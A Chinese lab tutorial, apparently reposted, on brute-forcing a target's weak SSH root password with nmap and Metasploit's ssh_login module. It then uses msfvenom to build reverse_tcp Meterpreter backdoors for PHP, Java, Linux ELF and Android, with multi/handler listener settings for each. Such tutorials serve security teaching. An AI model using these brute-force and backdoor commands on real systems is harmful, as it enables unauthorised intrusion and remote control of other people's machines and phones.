思享工具箱

Metasploit后门渗透Linux系统以及跨平台后门生成

摘要:
Metasploit后门穿透Linux系统和跨平台后门一代Metasploi后门穿透Linux平台和跨平台的后门一代。Metasploid爆炸目标主机SSH 1.1爆破过程2.PHP后门一代3.JAVA后门一代4.Linux后门一代5.Android后门一代参考文件2019-08-2814:27:50周三TOC1。Metasploit攻击目标主机SSH 1.实验原理:目标根用户很弱

Metasploit后门渗透Linux系统以及跨平台后门生成

Metasploit后门渗透Linux系统以及跨平台后门生成
1.Metasploit对目标主机SSH爆破
1.1爆破过程
2.PHP后门生成
3.JAVA后门生成
4.LINUX后门生成
5.Android后门生成
☛参考文档
☛2019-08-28 14:27:50 星期三
TOC

1.Metasploit对目标主机SSH爆破

1.实验原理:靶机root用户存在弱口令漏洞,利用枚举的方法破解目标主机ssh服务

1.1爆破过程

1.验证局域网内部存活主机:nmap -sP 192.168.73.0/24;得到靶机IP
Metasploit后门渗透Linux系统以及跨平台后门生成第1张

2.扫描靶机的操作系统:nmap -O 192.168.73.128;得到靶机的操作系统及版本号
Metasploit后门渗透Linux系统以及跨平台后门生成第2张

3.扫描靶机的端口开放及应用程序的版本号:nmap -sV -Pn 192.168.73.128;发现22端口开放,其应用程序为ssh
Metasploit后门渗透Linux系统以及跨平台后门生成第3张

4.打开Metasploit工具,利用msf ssh_login模块暴力破解靶机ssh密码:use auxiliary/scanner/ssh/ssh_login;进入模块show options配置
Metasploit后门渗透Linux系统以及跨平台后门生成第4张

5.建立用户名字典及密码字典(为了减少爆破时间,用户名及密码设置特定的几个即可)
Metasploit后门渗透Linux系统以及跨平台后门生成第5张

  • user.txtpass.txt文件放到kali linux指定目录下

6.准备进行ssh爆破:设置用户名字典和密码字典的路径;设置靶机的IP地址;设置线程为50;开始执行
Metasploit后门渗透Linux系统以及跨平台后门生成第6张

  • exploit之后,没有显示;将VERBOSE设置为true即可

7.等待ssh爆破执行完毕
Metasploit后门渗透Linux系统以及跨平台后门生成第7张

8.开始链接
Metasploit后门渗透Linux系统以及跨平台后门生成第8张

2.PHP后门生成

1.示例指令:

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.73.131 -f raw >/root/test.php

Metasploit后门渗透Linux系统以及跨平台后门生成第9张

  • LHOST:攻击者IP
  • PHP后门代码
    Metasploit后门渗透Linux系统以及跨平台后门生成第10张

2.配置Metasploitexploit监听

search exploit/hanler  // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler        // 使用模块
show options         // 配置
set LHOST 192.168.73.131
set payload php/meterpreter/reverse_tcp         // 设置测试的载荷
exploit            // 监听

Metasploit后门渗透Linux系统以及跨平台后门生成第11张

  • php后门使用
    Metasploit后门渗透Linux系统以及跨平台后门生成第12张

3.JAVA后门生成

1.示例指令

msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.73.131 -o /root/Desktop/test.jar

Metasploit后门渗透Linux系统以及跨平台后门生成第13张

2.配置Metasploitexploit监听

search exploit/hanler  // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler        // 使用模块
show options         // 配置
set LHOST 192.168.73.131
set payload java/meterpreter/reverse_tcp         // 设置测试的载荷
exploit            // 监听

Metasploit后门渗透Linux系统以及跨平台后门生成第14张

  • java后门使用
    Metasploit后门渗透Linux系统以及跨平台后门生成第15张

4.LINUX后门生成

1.示例指令:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=4444 -f elf > root/Desktop/shell

Metasploit后门渗透Linux系统以及跨平台后门生成第16张

2.配置Metasploitexploit监听

search exploit/hanler  // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler        // 使用模块
show options         // 配置
set LHOST 192.168.73.131
set payload linux/x86/meterpreter/reverse_tcp         // 设置测试的载荷
exploit            // 监听

Metasploit后门渗透Linux系统以及跨平台后门生成第17张

  • linux后门使用
    Metasploit后门渗透Linux系统以及跨平台后门生成第18张

5.Android后门生成

1.示例指令:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=5555 R > /root/Linux/backdoor.apk

Metasploit后门渗透Linux系统以及跨平台后门生成第19张

2.配置Metasploitexploit监听

search exploit/hanler  // (exploit/multi/handler:通用有效负载处理程序)
use exploit/multi/handler        // 使用模块
show options         // 配置
set LHOST 192.168.73.131
set LPORT 5555
set payload android/meterpreter/reverse_tcp         // 设置测试的载荷
exploit            // 监听

Metasploit后门渗透Linux系统以及跨平台后门生成第20张

☛参考文档

☛2019-08-28 14:27:50 星期三



来自为知笔记(Wiz)


标签:#metasploit#linux系统#handler | 浏览:120 | 发布日期:

免责声明:文章转载自《Metasploit后门渗透Linux系统以及跨平台后门生成》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇利用Java编写简单IIS日志清理工具 规格严格NodeRed使用1 安装下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

Linux(centos)新建,删除,移动,重命名文件夹和文件的命令

1.新建文件夹 mkdir 文件名 新建一个名为test的文件夹在home下 view source1 mkdir /home/test 2.新建文本 在home下新建一个test.sh脚本  vi /home/test.sh 3.删除文件或文件夹 1、删除home目录下的test目录  rm /home/test 2、这种不带参数的删除方法经常会提示无法...

Linux中的16个Echo命令示例

在Linux中Echo命令是日常操作任务中广泛使用的命令之一。echo命令是一个内置的命令行工具,它可以将文本或字符串打印到标准输出或重定向输出到文件。该命令通常在bash shell或其他shell中使用,用于打印命令的输出。在bash shell脚本中也经常使用Echo命令。echo命令的语法$ echo [option] [string] 在本文中...

linux 命令收集 阿里云nginx升级等 查看磁盘空间 版本等

—————————————————— 查磁盘 df -h此命令直观的呈现出磁盘大小有多少Gdf -hl文件系统 容量 已用 可用 已用% 挂载点/dev/hdb2 75G 75G 0 100% /就是HD硬盘借口的第二个硬盘(b)上,里面的第二个分区(2),容量是75G,用了75G,可用是0,因此利用率是100%, 他被挂载到根分区目录上(/)。 http...

VM学习—实现自己的内核

一、背景知识 介绍:KVM 全称是 基于内核的虚拟机(Kernel-based Virtual Machine),它是Linux 的一个内核模块,该内核模块使得 Linux 变成了一个 Hypervisor。 KVM架构:KVM 是基于虚拟化扩展(Intel VT 或者 AMD-V)的 X86 硬件的开源的 Linux 原生的全虚拟化解决方案。KVM 本...

Linux netstat命令详解和使用例子(显示各种网络相关信息)

netstat命令用于显示与IP、TCP、UDP和ICMP协议相关的统计数据,一般用于检验本机各端口的网络连接情况。netstat是在内核中访问网络及相关信息的程序,它能提供TCP连接,TCP和UDP监听,进程内存管理的相关报告 原文链接:https://www.jb51.net/LINUXjishu/152405.html 如果你的计算机有时候接收...

linux shell脚本编程笔记(五): 重定向

I/O重定向 简述: 默认情况下始终有3个"文件"处于打开状态, stdin (键盘), stdout (屏幕), and stderr (错误消息输出到屏幕上). 这3个文件和其他打开的文件都可以被重定向. 对于重定向简单的解释就是捕捉一个文件, 命令, 程序, 脚本, 或者甚至是脚本中的代码块的输出, 然后将这些输出作为输入发送到另一个文件, 命令,...

最新文章

随机推荐

思享工具箱导航